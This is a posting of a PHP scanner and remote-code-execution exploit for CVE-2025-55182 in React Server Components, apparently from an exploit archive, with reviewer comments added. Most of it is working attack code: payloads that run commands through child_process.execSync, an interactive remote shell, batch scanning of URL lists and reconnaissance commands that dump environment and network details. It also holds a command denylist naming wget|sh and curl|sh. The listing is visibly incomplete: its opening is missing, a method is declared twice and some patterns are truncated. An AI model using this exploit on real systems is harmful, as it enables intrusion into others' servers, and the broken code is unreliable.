=============================================================================================================================================
| # Title     : React 19.2.0 PHP Scanner & RCE Exploit Tool
| # Author    : indoushka
| # Tested on : Windows 11 Fr (Pro) / browser: Mozilla Firefox 145.0.2 (64 bits)
| # Vendor    : https://react.dev
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212444/ & CVE-2025-55182

[+] Summary : This project delivers a PHP-based vulnerability scanner and remote code execution (RCE) exploit for CVE-2025-55182, which affects React Server Components.

[+] Includes:
    - Target scanning (single/multiple hosts)
    - Vulnerability detection
    - RCE payload execution
    - Interactive remote shell
    - Structured JSON parsing with fallback
    - Multipart form-data payload handling

The exploit leverages RSC serialization weaknesses to execute arbitrary commands and validate successful exploitation.
[+] POC :

        // NOTE(review): the listing begins in the middle of the constructor. The opening PHP tag,
        // the class declaration and the properties read later through $this (colors, timeout,
        // verify_ssl, user_agent, max_cmd_length) are not on the page; presumably they were lost
        // when the page was extracted.
        init_colors();

        // Turns off certificate and hostname verification in the default stream context, i.e. for
        // every later stream call in this process that does not pass its own context. This disables
        // the check itself, it does not merely silence warnings.
        if (function_exists('stream_context_set_default')) {
            stream_context_set_default([
                'ssl' => [
                    'verify_peer' => false,
                    'verify_peer_name' => false,
                ]
            ]);
        }
    }

    /**
     * Fills $this->colors with ANSI escape sequences, or with empty strings when the
     * terminal is not expected to render them.
     */
    private function init_colors() {
        // Windows consoles need an explicit capability check; everything else is assumed capable.
        $is_windows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';
        $has_ansi_support = false;
        if ($is_windows && PHP_SAPI === 'cli') {
            // VT100 support reported by PHP, or one of the usual environment hints.
            $has_ansi_support = (function_exists('sapi_windows_vt100_support') && sapi_windows_vt100_support(STDOUT)) || getenv('ANSICON') !== false || getenv('ConEmuANSI') === 'ON' || getenv('TERM') === 'xterm';
        } elseif (!$is_windows) {
            $has_ansi_support = true; // Unix-like systems usually support ANSI
        }
        if ($has_ansi_support) {
            $this->colors = [
                'HEADER' => "\033[95m",
                'BLUE' => "\033[94m",
                'GREEN' => "\033[92m",
                'WARNING' => "\033[93m",
                'FAIL' => "\033[91m",
                'ENDC' => "\033[0m",
                'BOLD' => "\033[1m",
                'CYAN' => "\033[96m",
                'MAGENTA' => "\033[95m",
                'BG_RED' => "\033[41m"
            ];
        } else {
            // Same keys, empty values, so color() callers need no special case.
            $this->colors = array_fill_keys([
                'HEADER', 'BLUE', 'GREEN', 'WARNING', 'FAIL', 'ENDC', 'BOLD', 'CYAN', 'MAGENTA', 'BG_RED'
            ], '');
        }
    }

    /** Returns the escape sequence stored under $name, or '' when the key is unknown. */
    private function color($name) {
        return $this->colors[$name] ?? '';
    }

    /** Prints $msg with a "[*] " prefix in the BLUE color. */
    private function print_info($msg) {
        echo $this->color('BLUE') . "[*] " . $msg . $this->color('ENDC') . PHP_EOL;
    }

    /** Prints $msg with a "[+] " prefix in the GREEN color. */
    private function print_success($msg) {
        echo $this->color('GREEN') . "[+] " . $msg . $this->color('ENDC') . PHP_EOL;
    }

    /** Prints $msg with a "[-] " prefix in the FAIL color. */
    private function print_error($msg) {
        echo $this->color('FAIL') . "[-] " . $msg . $this->color('ENDC') . PHP_EOL;
    }

    /** Prints $msg with a "[!] " prefix in the WARNING color. */
    private function print_warning($msg) {
        echo $this->color('WARNING') . "[!] " . $msg . $this->color('ENDC') . PHP_EOL;
    }

    /** Prints $msg with a "[CRITICAL] " prefix on the BG_RED background in bold. */
    private function print_critical($msg) {
        echo $this->color('BG_RED') . $this->color('BOLD') . "[CRITICAL] " . $msg . $this->color('ENDC') . 
PHP_EOL;
    }

    /**
     * Operator-side filter applied to a command string before it is sent.
     *
     * Returns false (after printing the reason) when $cmd is longer than
     * $this->max_cmd_length or matches one of the regexes below, true otherwise.
     *
     * NOTE(review): this check runs on the operator's machine and only limits what this
     * client will transmit. It gives no protection to the system that receives the request,
     * and a short regex denylist cannot be treated as a safety control. The "safe mode" and
     * "Secure" labels used elsewhere in the listing refer to this filter.
     */
    private function validate_command($cmd) {
        // Length limit.
        if (strlen($cmd) > $this->max_cmd_length) {
            $this->print_error("Command too long (max {$this->max_cmd_length} characters)");
            return false;
        }
        // Denylist of destructive or nested-execution patterns.
        $dangerous_patterns = [
            '/\brm\s+-rf\b/i',
            '/\bmkfs\b/i',
            '/\bdd\s+if=/i',
            '/\bchmod\s+777\b/i',
            '/\bwget\b.*\|\s*sh/i',
            '/\bcurl\b.*\|\s*sh/i',
            '/;.*;/', // Multiple command separators
            '/`.*`/', // Backticks
            '/\$\s*\(/', // $() syntax
            '/\|\s*\{/', // Pipe to block
        ];
        foreach ($dangerous_patterns as $pattern) {
            if (preg_match($pattern, $cmd)) {
                $this->print_warning("Potentially dangerous command detected and blocked");
                return false;
            }
        }
        return true;
    }

    /**
     * Strips characters outside an allowlist from $cmd and returns the result.
     *
     * Commands starting with "echo" keep only word characters, whitespace, '-', '_' and '.';
     * every other command is filtered against the wider character class below, after which
     * runs of the same separator (;, & or |) are collapsed to a single character.
     */
    private function sanitize_command($cmd) {
        $cmd = trim($cmd);
        // echo is handled separately because scan() uses it to send the probe token.
        if (preg_match('/^echo\s+/i', $cmd)) {
            // Text after the 5-character "echo " prefix, with surrounding quotes and whitespace removed.
            $echo_content = substr($cmd, 5);
            $echo_content = trim($echo_content, " \t\n\r\0\x0B\"'");
            // Only allow safe characters for echo
            $echo_content = preg_replace('/[^\w\d\s\-_\.]/', '', $echo_content);
            return 'echo ' . 
$echo_content;
        }
        // Wider allowlist for every other command.
        $cmd = preg_replace('/[^\w\d\s\-_\.\/\\\,:;&|><=\[\]{}()@#!~`\$\+\-\*"\'?]/', '', $cmd);
        // Collapse repeated separators.
        $cmd = preg_replace('/([;&|])\1+/', '$1', $cmd);
        return $cmd;
    }

    /**
     * Returns the JSON document that send_payload() places in the second form field.
     *
     * Four candidate structures are defined, each an "id"/"bound" pair whose "bound" string
     * embeds $cmd; only the first one is ever returned, the other three are never sent.
     *
     * For request-body inspection: the transmitted JSON carries the keys "id" and "bound" and
     * the literal strings `child_process`, `execSync` and `RCE_TEST`.
     *
     * NOTE(review): nothing on this page shows this payload shape being accepted by a React
     * Server Components endpoint. Until that is confirmed against the vendor advisory, a
     * "not vulnerable" result from scan() is inconclusive, not evidence of a patched host.
     */
    private function build_payload($cmd) {
        $payloads = [
            // Primary payload
            [
                "id" => "vm#runInThisContext",
                "bound" => ["console.log('RCE_TEST'); process.mainModule.require('child_process').execSync('{$cmd}').toString()"]
            ],
            // Alternative payload 1 - Different context
            [
                "id" => "vm#runInNewContext",
                "bound" => ["global.process.mainModule.require('child_process').execSync('{$cmd}').toString()"]
            ],
            // Alternative payload 2 - Using module constructor
            [
                "id" => "module#constructor",
                "bound" => ["new module.constructor('return process')().mainModule.require('child_process').execSync('{$cmd}').toString()"]
            ],
            // Alternative payload 3 - Direct require
            [
                "id" => "global#require",
                "bound" => ["global.require('child_process').execSync('{$cmd}').toString()"]
            ]
        ];
        // Index 0 is hard-coded; no caller can select another entry.
        return json_encode($payloads[0]);
    }

    /**
     * Validates and sanitizes $cmd, wraps it with build_payload() and POSTs it to $url as
     * multipart/form-data through file_get_contents().
     *
     * Request traits visible here that a defender can match on: two form fields named
     * `$ACTION_REF_0` (value `1`) and `$ACTION_0:0` (the JSON payload); a boundary made of
     * `----WebKitFormBoundary` followed by 32 lowercase hex characters; the headers
     * `X-Requested-With: XMLHttpRequest` and `Connection: close`; and an `Origin` header
     * equal to the target's own scheme and host.
     *
     * @param string $url             Target URL.
     * @param string $cmd             Command string supplied by the caller.
     * @param int    $payload_variant Only echoed back in the result array; build_payload()
     *                                is not given it.
     * @return array Keys content, headers, status, success and error, plus response_time on
     *               the request paths. The validation-failure return has no response_time key,
     *               which scan() reads on failure.
     */
    private function send_payload($url, $cmd, $payload_variant = 0) {
        // Refuse to send anything the local filter rejects.
        if (!$this->validate_command($cmd)) {
            return [
                'content' => null,
                'headers' => [],
                'status' => 0,
                'success' => false,
                'error' => 'Command validation failed'
            ];
        }
        // Character allowlist.
        $safe_cmd = $this->sanitize_command($cmd);
        // $payload_variant is not passed on, so the payload is always the same structure.
        $payload = $this->build_payload($safe_cmd);
        // Hand-built multipart body; the random suffix is 16 bytes rendered as hex.
        $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
        $content = "--{$boundary}\r\n";
        $content .= "Content-Disposition: form-data; name=\"\$ACTION_REF_0\"\r\n\r\n1\r\n";
        $content .= "--{$boundary}\r\n";
        $content .= "Content-Disposition: form-data; name=\"\$ACTION_0:0\"\r\n\r\n";
        $content .= $payload . 
"\r\n";
        $content .= "--{$boundary}--\r\n";
        $headers = [
            "Content-Type: multipart/form-data; boundary={$boundary}",
            "User-Agent: {$this->user_agent}",
            "Accept: */*",
            "Connection: close",
            "X-Requested-With: XMLHttpRequest",
            "Origin: " . parse_url($url, PHP_URL_SCHEME) . "://" . parse_url($url, PHP_URL_HOST)
        ];
        $context = stream_context_create([
            'http' => [
                'method' => 'POST',
                'header' => implode("\r\n", $headers),
                'content' => $content,
                'timeout' => $this->timeout,
                // Return the body of 4xx/5xx responses instead of failing.
                'ignore_errors' => true
            ],
            'ssl' => [
                // Per-request TLS verification follows $this->verify_ssl (its value is not on the page).
                'verify_peer' => $this->verify_ssl,
                'verify_peer_name' => $this->verify_ssl
            ]
        ]);
        try {
            $start_time = microtime(true);
            // "@" hides the warning; failure is detected through the false return value.
            $response = @file_get_contents($url, false, $context);
            $response_time = round((microtime(true) - $start_time) * 1000, 2);
            // Set by PHP's HTTP wrapper in the local scope; default to [] when no response arrived.
            $http_response_header = $http_response_header ?? [];
            return [
                'content' => $response,
                'headers' => $http_response_header,
                'status' => $this->get_http_status($http_response_header),
                'success' => $response !== false,
                'response_time' => $response_time,
                'payload_variant' => $payload_variant,
                'error' => $response === false ? error_get_last()['message'] ?? 'Unknown error' : null
            ];
        } catch (Exception $e) {
            $this->print_error("Connection error: " . $e->getMessage());
            return [
                'content' => null,
                'headers' => [],
                'status' => 0,
                'success' => false,
                'response_time' => 0,
                'error' => $e->getMessage()
            ];
        }
    }

    /**
     * Extracts the numeric status code from the first response header line.
     * Returns 0 when $headers is empty or the line does not match "HTTP/<d>.<d> <code>".
     */
    private function get_http_status($headers) {
        if (empty($headers)) return 0;
        $status_line = $headers[0];
        preg_match('/HTTP\/\d\.\d\s+(\d+)/', $status_line, $matches);
        return isset($matches[1]) ? 
(int)$matches[1] : 0;
    }

    /** Returns $length random characters drawn from [a-zA-Z0-9] using random_int(). */
    private function generate_token($length = 16) {
        $chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
        $token = '';
        for ($i = 0; $i < $length; $i++) {
            $token .= $chars[random_int(0, strlen($chars) - 1)];
        }
        return $token;
    }

    /**
     * Tries three ways of pulling command output out of a response body and reports which
     * one produced a value.
     *
     * @param string      $content Response body.
     * @param string|null $token   Probe token to search for, or null to skip that step.
     * @return array Keys type ('unknown', 'json', 'raw' or 'pattern'), result, error,
     *               token_found, json_valid, raw_preview (first 200 bytes), and full_json
     *               when the body decoded as JSON.
     *
     * NOTE(review): token_found is set when the token occurs anywhere in the body. The token
     * is part of the request, so a server that merely reflects the request body (for example
     * in an error page) would also satisfy this test; it is not proof that a command ran.
     */
    private function extract_result_from_response($content, $token = null) {
        $result = [
            'type' => 'unknown',
            'result' => null,
            'error' => null,
            'token_found' => false,
            'json_valid' => false,
            'raw_preview' => substr($content, 0, 200) . (strlen($content) > 200 ? '...' : '')
        ];
        // Method 1: the body is a JSON document with result/error/message keys.
        if (!empty($content)) {
            $json_data = @json_decode($content, true);
            if (json_last_error() === JSON_ERROR_NONE) {
                $result['json_valid'] = true;
                $result['type'] = 'json';
                $result['full_json'] = $json_data;
                if (isset($json_data['result'])) {
                    $result['result'] = $json_data['result'];
                }
                if (isset($json_data['error'])) {
                    $result['error'] = $json_data['error'];
                }
                // "message" overwrites "error" when both are present.
                if (isset($json_data['message'])) {
                    $result['error'] = $json_data['message'];
                }
            }
        }
        // Method 2: plain substring search for the token.
        if ($token !== null && !empty($content)) {
            if (strpos($content, $token) !== false) {
                $result['token_found'] = true;
                $result['type'] = $result['type'] === 'unknown' ? 
'raw' : $result['type'];
                // Keep up to 100 bytes on either side of the first occurrence.
                $pos = strpos($content, $token);
                $start = max(0, $pos - 100);
                $end = min(strlen($content), $pos + 100);
                $context = substr($content, $start, $end - $start);
                if (empty($result['result'])) {
                    $result['result'] = $context;
                }
            }
        }
        // Method 3: first regex that matches wins.
        // NOTE(review): the last two patterns look truncated (they end in </pre> and </code>
        // but have no opening tag); the start of each was presumably lost in extraction.
        if (empty($result['result']) && !empty($content)) {
            $patterns = [
                '/result["\']?\s*:\s*["\']?([^"\',}]+)/i',
                '/output["\']?\s*:\s*["\']?([^"\',}]+)/i',
                '/data["\']?\s*:\s*["\']?([^"\',}]+)/i',
                '/]*>([^<]+)<\/pre>/i',
                '/]*>([^<]+)<\/code>/i'
            ];
            foreach ($patterns as $pattern) {
                if (preg_match($pattern, $content, $matches)) {
                    $result['result'] = trim($matches[1]);
                    $result['type'] = 'pattern';
                    break;
                }
            }
        }
        return $result;
    }

    /**
     * Sends an "echo <random token>" probe to $url and classifies the response.
     *
     * @param string $url      Target URL.
     * @param bool   $detailed Print the analysis and, on a positive result, send four further
     *                         commands (whoami, uname/ver, pwd, id). A detailed scan is
     *                         therefore not a read-only check.
     * @return array|false false when the request failed, otherwise
     *                     ['vulnerable' => bool, 'confidence' => 'high'|'medium'|'low'|'none'].
     *
     * NOTE(review): only the "high" branch ties the token to a parsed JSON result. "medium"
     * accepts the token anywhere in the body (see extract_result_from_response) and "low"
     * needs no token at all, only one of the words root, admin, www-data or user in the
     * extracted text, which ordinary application responses can contain. Treat medium and low
     * findings as leads to verify, and establish patch status from the deployed package
     * versions.
     */
    public function scan($url, $detailed = false) {
        $this->print_info("Scanning {$url} for CVE-2025-55182...");
        $token = $this->generate_token(16);
        $cmd = "echo " . $token; // No quotes needed for echo
        $response = $this->send_payload($url, $cmd);
        if (!$response['success'] || $response['content'] === null) {
            $this->print_error("Failed to connect to target.");
            $this->print_info("Error: " . ($response['error'] ?? 'Unknown'));
            $this->print_info("Response time: {$response['response_time']}ms");
            // Callers index the return value as an array; see batch_scan() and exploit().
            return false;
        }
        $content = $response['content'];
        $analysis = $this->extract_result_from_response($content, $token);
        if ($detailed) {
            $this->print_info("=== Detailed Analysis ===");
            $this->print_info("Response type: " . $analysis['type']);
            $this->print_info("HTTP Status: " . $response['status']);
            $this->print_info("Response time: {$response['response_time']}ms");
            $this->print_info("JSON valid: " . ($analysis['json_valid'] ? 'Yes' : 'No'));
            $this->print_info("Token found: " . ($analysis['token_found'] ? 'Yes' : 'No'));
            if ($analysis['error']) {
                $this->print_warning("Server error: " . 
$analysis['error']);
            }
        }
        // Classification, strongest evidence first.
        $is_vulnerable = false;
        $confidence = 'low';
        // High confidence: Token found in JSON result
        if ($analysis['type'] === 'json' && $analysis['result'] && strpos($analysis['result'], $token) !== false) {
            $is_vulnerable = true;
            $confidence = 'high';
            $this->print_success("HIGH CONFIDENCE: Token found in JSON result");
        }
        // Medium confidence: Token found in raw response
        elseif ($analysis['token_found']) {
            $is_vulnerable = true;
            $confidence = 'medium';
            $this->print_success("MEDIUM CONFIDENCE: Token found in raw response");
        }
        // Low confidence: keyword match only, no token
        elseif ($analysis['result'] && preg_match('/\b(root|admin|www-data|user)\b/i', $analysis['result'])) {
            $is_vulnerable = true;
            $confidence = 'low';
            $this->print_warning("LOW CONFIDENCE: RCE-like output detected");
        }
        if ($is_vulnerable) {
            $this->print_success("Target appears to be VULNERABLE (confidence: {$confidence})!");
            if ($analysis['result']) {
                $output = trim($analysis['result']);
                $output_preview = strlen($output) > 100 ? substr($output, 0, 100) . '...' : $output;
                $this->print_info("Output preview: " . $output_preview);
            }
            // Detailed mode sends further commands to the target at this point.
            if ($detailed) {
                $this->print_info("Gathering system information...");
                $info_cmds = [
                    'whoami' => 'Current user',
                    'uname -a || ver' => 'System info',
                    'pwd' => 'Current directory',
                    'id || whoami /all' => 'User details'
                ];
                foreach ($info_cmds as $cmd => $desc) {
                    $resp = $this->send_payload($url, $cmd);
                    if ($resp['success'] && $resp['content']) {
                        $info = $this->extract_result_from_response($resp['content']);
                        if ($info['result']) {
                            $clean_result = trim(preg_replace('/\s+/', ' ', $info['result']));
                            $this->print_info("{$desc}: " . 
substr($clean_result, 0, 80));
                        }
                    }
                    usleep(50000); // 50ms delay
                }
            }
            return ['vulnerable' => true, 'confidence' => $confidence];
        } else {
            $this->print_warning("Target does not appear to be vulnerable.");
            if ($detailed) {
                $this->print_info("Response preview: " . $analysis['raw_preview']);
            }
            return ['vulnerable' => false, 'confidence' => 'none'];
        }
    }

    /**
     * Runs a detailed scan of $url and then an interactive loop that sends each line typed
     * by the operator through send_payload() and prints the extracted result.
     *
     * NOTE(review): the authorization warning is only printed. Nothing here checks or records
     * authorization, and the single confirmation prompt appears only when the scan came back
     * negative. scan() can also return false, in which case the offset read below is applied
     * to a boolean.
     *
     * On the wire each command is a separate POST of the form described on send_payload(),
     * spaced at least 100 ms apart.
     */
    public function exploit($url) {
        $this->print_critical("=== EXPLOIT MODE ACTIVATED ===");
        $this->print_warning("You are about to exploit a vulnerable system.");
        $this->print_warning("Make sure you have proper authorization!");
        // The detailed scan already sends commands to the target.
        $scan_result = $this->scan($url, true);
        if (!$scan_result['vulnerable']) {
            $this->print_error("Target is not vulnerable or confidence is too low.");
            $this->print_info("Would you like to proceed anyway? (yes/no): ");
            $response = trim(fgets(STDIN));
            if (strtolower($response) !== 'yes') {
                $this->print_info("Exploit cancelled.");
                return;
            }
            $this->print_warning("Proceeding with low-confidence target...");
        }
        $this->print_success("Starting interactive shell on {$url}");
        $this->print_info("Type 'help' for available commands, 'exit' to quit.");
        // Values used only to build the prompt.
        $sysinfo = $this->get_system_info($url);
        $user = $sysinfo['user'] ?? 'unknown';
        $hostname = $sysinfo['hostname'] ?? 'unknown';
        $platform = $sysinfo['platform'] ?? 'unknown';
        // Kept in memory for the "history" command and the final count.
        $command_history = [];
        while (true) {
            // Build prompt with colors
            $prompt = $this->color('GREEN') . $user . "@" . $hostname . $this->color('ENDC') . " [" . $this->color('CYAN') . $platform . $this->color('ENDC') . "] " . $this->color('BLUE') . $this->color('BOLD') . "> " . 
$this->color('ENDC');
            echo $prompt;
            // Prefer readline (completion and history) when the extension is loaded.
            if (function_exists('readline')) {
                readline_completion_function(function($input, $index) {
                    $commands = ['help', 'exit', 'clear', 'sysinfo', 'history', 'pwd', 'ls', 'cd', 'cat', 'whoami', 'id'];
                    return array_filter($commands, function($cmd) use ($input) {
                        return stripos($cmd, $input) === 0;
                    });
                });
                $cmd = readline();
                if ($cmd !== '') {
                    readline_add_history($cmd);
                    $command_history[] = $cmd;
                }
            } else {
                $cmd = trim(fgets(STDIN));
                if (!empty($cmd)) {
                    $command_history[] = $cmd;
                }
            }
            // Handle exit
            if (strtolower($cmd) === 'exit' || strtolower($cmd) === 'quit') {
                $this->print_info("Exiting interactive shell...");
                break;
            }
            // Handle empty command
            if (empty($cmd)) {
                continue;
            }
            // Built-in commands are handled locally and never sent to the target.
            switch (strtolower($cmd)) {
                case 'help':
                    $this->show_help();
                    continue 2;
                case 'clear':
                case 'cls':
                    // Local call with a fixed string; no operator input reaches system().
                    system(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'cls' : 'clear');
                    continue 2;
                case 'history':
                    $this->show_history($command_history);
                    continue 2;
                case 'sysinfo':
                    $this->show_sysinfo($url);
                    continue 2;
                case 'safe':
                    // Prints two messages only; no state changes, the filter in
                    // send_payload() is always applied.
                    $this->print_info("Safe mode enabled - blocking dangerous commands");
                    $this->print_info("Current restrictions: rm, mkfs, dd, chmod 777, wget|sh, curl|sh");
                    continue 2;
            }
            // Same length check that validate_command() repeats inside send_payload().
            if (strlen($cmd) > $this->max_cmd_length) {
                $this->print_error("Command too long (max {$this->max_cmd_length} characters)");
                $this->print_info("Tip: Use redirects or split complex commands");
                continue;
            }
            // Execute command
            $start_time = microtime(true);
            $response = $this->send_payload($url, $cmd);
            $exec_time = round((microtime(true) - $start_time) * 1000, 2);
            if ($response['success'] && $response['content']) {
                $analysis = $this->extract_result_from_response($response['content']);
                if ($analysis['result']) {
                    echo trim($analysis['result']) . PHP_EOL;
                    $this->print_info("Execution time: {$exec_time}ms | HTTP: {$response['status']}");
                } elseif ($analysis['error']) {
                    $this->print_error("Server error: " . 
$analysis['error']);
                } else {
                    $this->print_warning("Command executed but no output returned.");
                    $this->print_info("Response type: " . $analysis['type']);
                }
            } else {
                $this->print_error("Command failed or no response.");
                $this->print_info("Status: {$response['status']} | Time: {$response['response_time']}ms");
                if ($response['error']) {
                    $this->print_info("Error: " . $response['error']);
                }
            }
            // Fixed pause between requests.
            usleep(100000); // 100ms
        }
        $this->print_info("Session ended. Total commands executed: " . count($command_history));
    }

    /**
     * Sends three commands and returns ['user' => ..., 'hostname' => ..., 'platform' => ...],
     * leaving 'unknown' for any value that produced no result.
     */
    private function get_system_info($url) {
        $info = [
            'user' => 'unknown',
            'hostname' => 'unknown',
            'platform' => 'unknown'
        ];
        // command => key of $info that receives the result
        $commands = [
            'whoami' => 'user',
            'hostname || hostname' => 'hostname',
            'uname -s -r -m || ver || systeminfo | findstr /B /C:"OS"' => 'platform'
        ];
        foreach ($commands as $cmd => $key) {
            $resp = $this->send_payload($url, $cmd);
            if ($resp['success'] && $resp['content']) {
                $analysis = $this->extract_result_from_response($resp['content']);
                if ($analysis['result']) {
                    $info[$key] = trim($analysis['result']);
                }
            }
            usleep(50000); // 50ms delay
        }
        return $info;
    }

    /**
     * Prints the command reference for the interactive loop.
     *
     * NOTE(review): a second show_help() is declared further down in the same class. PHP does
     * not allow two methods with the same name in one class, so the listing as published
     * would not load. The 'cat ' and 'cd ' entries end in a space where an argument
     * placeholder presumably stood before extraction, and the line break inside the
     * 'Output redirection' text is present in the listing as published.
     */
    private function show_help() {
        $help = [
            'Basic Commands:' => [
                'help' => 'Show this help message',
                'exit, quit' => 'Exit the interactive shell',
                'clear, cls' => 'Clear the terminal screen',
                'history' => 'Show command history',
                'sysinfo' => 'Display detailed system information',
                'safe' => 'Show safe mode restrictions'
            ],
            'File Operations:' => [
                'pwd' => 'Print working directory',
                'ls, ls -la, dir' => 'List directory contents',
                'cat ' => 'View file contents',
                'cd ' => 'Change directory (note: may not persist)'
            ],
            'System Info:' => [
                'whoami' => 'Current user',
                'id' => 'User ID and groups',
                'uname -a' => 'System information',
                'ps aux' => 'Running processes',
                'netstat -an' => 'Network connections'
            ],
            'Tips:' => [
                'Command chaining' => 'Use && for sequential commands',
                'Output redirection' => 'Use > to save output to 
file',
                'Pipes' => 'Use | to chain commands',
                'Background jobs' => 'Use & to run in background'
            ]
        ];
        foreach ($help as $section => $commands) {
            $this->print_info("\n{$section}");
            foreach ($commands as $cmd => $desc) {
                echo " " . str_pad($cmd, 25) . " - " . $desc . PHP_EOL;
            }
        }
    }

    /** Prints the numbered list of commands typed so far, or a notice when there are none. */
    private function show_history($history) {
        if (empty($history)) {
            $this->print_info("No command history yet.");
            return;
        }
        $this->print_info("Command History:");
        foreach ($history as $index => $cmd) {
            echo " [" . ($index + 1) . "] " . $cmd . PHP_EOL;
        }
    }

    /**
     * Sends ten inventory commands to $url and prints the first 100 bytes of each result.
     * Each command is its own request, 100 ms apart.
     */
    private function show_sysinfo($url) {
        $this->print_info("Gathering detailed system information...");
        // label => command string
        $checks = [
            'System' => 'uname -a || ver',
            'Kernel' => 'cat /proc/version 2>/dev/null || systeminfo | findstr /B /C:"OS"',
            'CPU' => 'cat /proc/cpuinfo 2>/dev/null || wmic cpu get name',
            'Memory' => 'free -h 2>/dev/null || wmic memorychip get capacity',
            'Disk' => 'df -h 2>/dev/null || wmic logicaldisk get size,freespace,caption',
            'Network' => 'ifconfig 2>/dev/null || ipconfig /all',
            'Users' => 'who 2>/dev/null || query user',
            'Processes' => 'ps aux | head -20 2>/dev/null || tasklist',
            'Environment' => 'env 2>/dev/null || set',
            'Packages' => 'dpkg -l 2>/dev/null || rpm -qa 2>/dev/null || pacman -Q'
        ];
        foreach ($checks as $name => $cmd) {
            $resp = $this->send_payload($url, $cmd);
            if ($resp['success'] && $resp['content']) {
                $analysis = $this->extract_result_from_response($resp['content']);
                if ($analysis['result']) {
                    $output = trim($analysis['result']);
                    $preview = substr($output, 0, 100);
                    $this->print_info("{$name}: " . $preview . (strlen($output) > 100 ? '...' : ''));
                }
            }
            usleep(100000); // 100ms delay
        }
    }

    /**
     * Runs scan() without detail against every non-empty line of $file_path, prints per-category
     * counts and optionally writes a plaintext report.
     *
     * @param string $file_path     File with one URL per line.
     * @param bool   $output_report When true, writes cve_scan_report_<timestamp>.txt to the
     *                              current working directory.
     * @return array|null Category name => list of URLs; nothing is returned when the file is
     *                    missing or empty.
     *
     * NOTE(review): scan() returns false when a request fails, and the offset read below then
     * evaluates as not set, so unreachable hosts are counted under "Not Vulnerable" and not
     * under "Errors". The report file lists every URL by category in clear text and should be
     * handled as sensitive assessment data.
     */
    public function batch_scan($file_path, $output_report = true) {
        if (!file_exists($file_path)) {
            $this->print_error("File not found: {$file_path}");
            return;
        }
        $urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        if (!$urls) {
            $this->print_error("No URLs found in file.");
            return;
        }
        $this->print_info("Loaded " . count($urls) . 
" URLs from {$file_path}");
        $this->print_warning("Batch scan starting. This may take a while...");
        $results = [
            'high_confidence' => [],
            'medium_confidence' => [],
            'low_confidence' => [],
            'not_vulnerable' => [],
            'errors' => []
        ];
        $start_time = time();
        foreach ($urls as $index => $url) {
            $url = trim($url);
            if (empty($url)) continue;
            // Progress and a linear ETA based on elapsed whole seconds.
            $current = $index + 1;
            $total = count($urls);
            $percent = round(($current / $total) * 100, 1);
            $elapsed = time() - $start_time;
            $eta = $total > 0 ? round(($elapsed / $current) * ($total - $current)) : 0;
            $this->print_info("Scanning [{$current}/{$total}] ({$percent}%) ETA: {$eta}s - {$url}");
            try {
                $result = $this->scan($url, false);
                if ($result['vulnerable']) {
                    switch ($result['confidence']) {
                        case 'high':
                            $results['high_confidence'][] = $url;
                            break;
                        case 'medium':
                            $results['medium_confidence'][] = $url;
                            break;
                        case 'low':
                            $results['low_confidence'][] = $url;
                            break;
                    }
                } else {
                    // Also reached when scan() returned false for a failed request.
                    $results['not_vulnerable'][] = $url;
                }
            } catch (Exception $e) {
                $results['errors'][] = $url . " - " . $e->getMessage();
            }
            // Fixed pause between targets.
            usleep(300000); // 300ms
        }
        // Console summary.
        $this->print_info("\n" . str_repeat("=", 60));
        $this->print_info("BATCH SCAN COMPLETE");
        $this->print_info("Total time: " . (time() - $start_time) . " seconds");
        $this->print_info(str_repeat("-", 60));
        // result key => [label, color]
        $categories = [
            'high_confidence' => ['High Confidence Vulnerable', $this->color('GREEN')],
            'medium_confidence' => ['Medium Confidence Vulnerable', $this->color('WARNING')],
            'low_confidence' => ['Low Confidence Vulnerable', $this->color('CYAN')],
            'not_vulnerable' => ['Not Vulnerable', $this->color('FAIL')],
            'errors' => ['Errors', $this->color('FAIL')]
        ];
        foreach ($categories as $key => [$label, $color]) {
            $count = count($results[$key]);
            echo $color . "[*] " . str_pad($label, 30) . ": " . $count . $this->color('ENDC') . PHP_EOL;
        }
        // The file name is timestamped and relative to the working directory.
        if ($output_report) {
            $report_file = 'cve_scan_report_' . date('Y-m-d_H-i-s') . 
'.txt';
            $report_content = "CVE-2025-55182 Scan Report\n";
            $report_content .= "Generated: " . date('Y-m-d H:i:s') . "\n";
            $report_content .= "Total URLs: " . count($urls) . "\n\n";
            foreach ($categories as $key => [$label, $color]) {
                $report_content .= "\n=== {$label} ===\n";
                foreach ($results[$key] as $item) {
                    $report_content .= $item . "\n";
                }
            }
            file_put_contents($report_file, $report_content);
            $this->print_success("Detailed report saved to: {$report_file}");
        }
        return $results;
    }

    /**
     * Prints the start-up banner.
     * NOTE(review): the banner text reads as one line here; its original line breaks were
     * presumably collapsed to spaces when the page was extracted.
     */
    private function print_banner() {
        $banner = $this->color('HEADER') . $this->color('BOLD') . " ╔══════════════════════════════════════════════════════════╗ ║ CVE-2025-55182 Scanner & Exploit Tool ║ ║ React Server Components RCE Vulnerability ║ ╚══════════════════════════════════════════════════════════╝" . $this->color('ENDC') . " " . $this->color('CYAN') . "[*] Features:" . $this->color('ENDC') . " • Multi-payload support for different environments • Command validation and sanitization • Confidence-based vulnerability detection • Interactive shell with command history • Batch scanning with detailed reporting • Safe mode to prevent dangerous commands " . $this->color('WARNING') . "[!] SECURITY WARNING:" . $this->color('ENDC') . " • This tool is for AUTHORIZED security testing ONLY • Unauthorized use is ILLEGAL and UNETHICAL • Use only on systems you OWN or have PERMISSION to test " . $this->color('FAIL') . $this->color('BOLD') . "[!] LEGAL NOTICE: You are responsible for your actions!" . $this->color('ENDC') . " ";
        echo $banner . PHP_EOL;
    }

    /**
     * Command-line entry point: prints the banner, refuses to run outside the CLI SAPI and
     * dispatches on $argv[1] (scan, exploit, test, help).
     */
    public function run() {
        $this->print_banner();
        if (PHP_SAPI !== 'cli') {
            $this->print_error("This tool must be run from command line.");
            echo "For web interface, use the separate web version." . 
PHP_EOL;
            exit(1);
        }
        global $argv;
        if (count($argv) < 2) {
            $this->show_help();
            exit(1);
        }
        $mode = $argv[1];
        switch ($mode) {
            case 'scan':
                // "-u URL" runs one detailed scan, "-f FILE" a batch scan.
                if (isset($argv[2]) && $argv[2] === '-u' && isset($argv[3])) {
                    $this->scan($argv[3], true);
